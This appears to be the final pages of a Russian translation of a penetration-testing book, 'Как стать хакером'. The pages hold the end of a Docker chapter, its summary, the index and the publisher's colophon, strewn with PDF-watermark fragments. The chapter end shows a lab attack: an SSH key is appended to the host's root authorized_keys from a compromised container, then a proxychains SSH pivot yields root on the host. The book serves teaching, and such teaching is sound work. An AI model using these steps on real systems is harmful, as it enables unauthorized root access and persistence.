Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
книги хакеры / Эдриан_Прутяну_Как_стать_хакером_сборник_практическиз_сценариев.pdf
Скачиваний:
18
Добавлен:
19.04.2024
Размер:
20.34 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

Резюме  377 BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

 

 

e

 

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

biBldmVudHVhbGx5IG9uZSBvZiB0aGVtIGxvb2tzIG92ZXIgYXQgdGhlIG90aGVyIGFuZCBnb

n

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

df

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

2VzLCAiV2hhdCB0aGUgaGVsbCBpcyB3YXRlcj8gIg== sensible@ansible" >> /host/root/.ssh/authorized_keys

Из подконтрольного нам контейнера можем выполнитьповоротс помощью сеанса Meterpreter, войти в сеть контейнера и пройти аутентификацию в SSHслужбе 172.18.0.1, которая, как мы ранее подозревали, основываясь на результатах сканирования nmap, принадлежит хосту.

root@kali:~# proxychains ssh root@172.18.0.1 -i ~/.ssh/id_rsa ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.1:22-<><>-OK

Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64)

root@vulndocker:~# id

uid=0(root) gid=0(root) groups=0(root)

Резюме

Уконтейнеров есть множество преимуществ, поэтому они – важная тема. Docker произвел настоящую революцию в плане обработки образов кон-

тейнеров и их развертывания. Будучи авторами вредоносных программ, мы должны рассматриватьвсе новыетехнологии с позиции хакера.Как можно это взломать и как использовать, чтобы получить доступ, которого у нас не было раньше?

Если бизнес переходитс виртуальных машин на контейнеры в надежде снизить затраты,предполагая,что они обеспечивают одинаковую защиту,компанияподвергаетсяперекрестныматакам,которыепреждебылитрудноосущест­ вимыми, если не невозможными.

В этой главе мы увидели, что компрометация простой CMS, использующей контейнеры, привела к доступу к другому контейнеру, что в итоге полностью скомпрометировало хост. Это не означает, что следует избегать Docker и его контейнеров, но, как и любое иное программное обеспечение, Docker нужно надежно настроить перед развертыванием. Уязвимый или неправильно настроенный контейнер позволит злоумышленникам перейти к другим, более важным приложениям или,что еще хуже, к хосту.

Мы также рассмотрели опасности развертывания приложений с использованием небезопасных контейнерных сетей. Нам удалось скомпрометировать приложение, и, оказавшись внутри, мы успешно развернулись по сети Docker, получив доступ к другим контейнерам и в конечном итоге скомпрометировав сам хост.

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

указатель

 

 

 

to

BUY

Предметныйg

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

А

АтакиXXE 253

П

Правило ограничения домена 209,  210,  211

A

Arachni 324,  325,  326,  327,  349

B

BApp Store 156,  157,  159,  163,  291

Burp Collaborator 25,  155,  173,  256,  257,  270

Burp Suite 25,  26,  28,  29,  42,  43,  45,  49, 

50,  57,  97,  101,  104,  106,  112,  155,  156,  159,  163,  172,  173,  174,  176, 179,  184,  261,  293,  295,  314

C

CDNJS 212

Composer 170,  194

CyberChef 245,  267,  268,  273,  335,  336

D

DeserLab 195,  197,  198,  200,  202,  205 DigitalOcean 27,  29,  138

Docker 13,  280,  296,  350,  351,  352,  353, 

354,  362,  365,  366,  367,  370,  371,  372,  373,  374,  375,  376,  377

Docker-SSH 372,  373,  374,  375 droopescan 39,  322,  323

Drupal 38,  39,  313,  314,  322,  324,  327,  349

E

ElevenPaths 96

F

FuzzDB 40,  69

G

Gobuster 42,  44,  45,  69

I

Intruder 25,  42,  43,  49,  50,  51,  53,  54,  55,

57,  59,  97,  98,  99,  101,  106,  107,  155,  176,  283,  296,  310

J

Joomla 38,  39,  313,  314,  322,  324,  327,  349

JoomScan 39

JRuby 156,  157

JWT4B 293,  294,  295

JWTRFC 291

Jython 156,  157,  199

K

Kali Linux 23,  24,  33,  37,  42,  43,  44,  75, 

77,  83,  223,  370

L

LDAP 90,  91,  287

Linode 27,  29

N

Nikto 37,  38,  41,  69

Nmap 33,  34,  35,  37,  40,  41,  69,  71,  72, 

73,  75,  88,  371

P

Packagist 194

Postman 295,  296,  297,  298,  299,  300,  302, 

306,  307,  312

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

ProxyCannon

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

S

109,  110,  111,  112,  113,  114

SOAP 253,  281,  282,  283,  284,  287,  288, 312

SQLMapper 163,  165

SQL-инъекция 172,  173,  220,  321,  325

T

Tor 89,  102,  103,  104,  105,  106,  107,  108,

109,  113

Torsocks 103

W

Weevely 82,  83,  84,  85,  86,  87,  359,  361,  3

63,  364,  366,  368

WhatWeb 37,  69

Предметный указатель 

Wireshark 197,  198

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

379 BUY

 

 

 

 

 

 

 

w Click

to

 

 

 

 

m

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

WordPress 38,  39,  264,  313,  314,  322,  324,

326,  327,  328,  329,  331,  336,  339,  343,  344,  345,  346,  349,  354,  356, 357,  359,  360,  366

WPScan 39,  68,  69,  314,  315,  317,  318,  322, 

327,  328,  329,  349

X

XSS 17,  22,  60,  62,  66,  68,  69,  116,  131, 

134,  137,  149,  176,  177,  208,  210,  214,  215,  216,  217,  218,  219,  222,  223,  226,  227,  228,  229,  231,  234,  236,  240,  242,  243,  247,  249,  310,  325

Z

ZedAttackProxy 26

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

df-xchan

 

.c

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

Книги издательства «ДМК Пресс» можно заказать в торгово-издательском холдингеdf-x chan

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

 

e

 

«Планета Альянс» наложенным платежом, выслав открытку или письмо по почтовому адресу: 115487, г. Москва, 2-й Нагатинский пр-д, д. 6А.

При оформлении заказа следует указать адрес (полностью), по которому должны быть высланы книги; фамилию, имя и отчество получателя. Желательно также указать свой телефон и электронный адрес.

Эти книги вы можете заказать и в интернет-магазине: www.a-planeta.ru.

Оптовые закупки: тел. +7 (499) 782-38-89. Электронный адрес: books@alians-kniga.ru.

Эдриан Прутяну

Как стать хакером

Сборник практических сценариев, позволяющих понять, как рассуждает злоумышленник

Главный редактор

Мовчан Д. А.

dmkpress@gmail.com

Перевод с английского

Беликов Д. А.

Редактор

Белявский Д. М.

Корректор

Юрьева В. М, Синяева Г. И.

Верстка

Паранская Н. В.

Дизайн обложки

Мовчан А. Г.

Формат 70×100 1/16.

Печать цифровая. Усл. печ. л. 27,79. Тираж 200 экз.

Веб-сайт издательства: www.dmkpress.com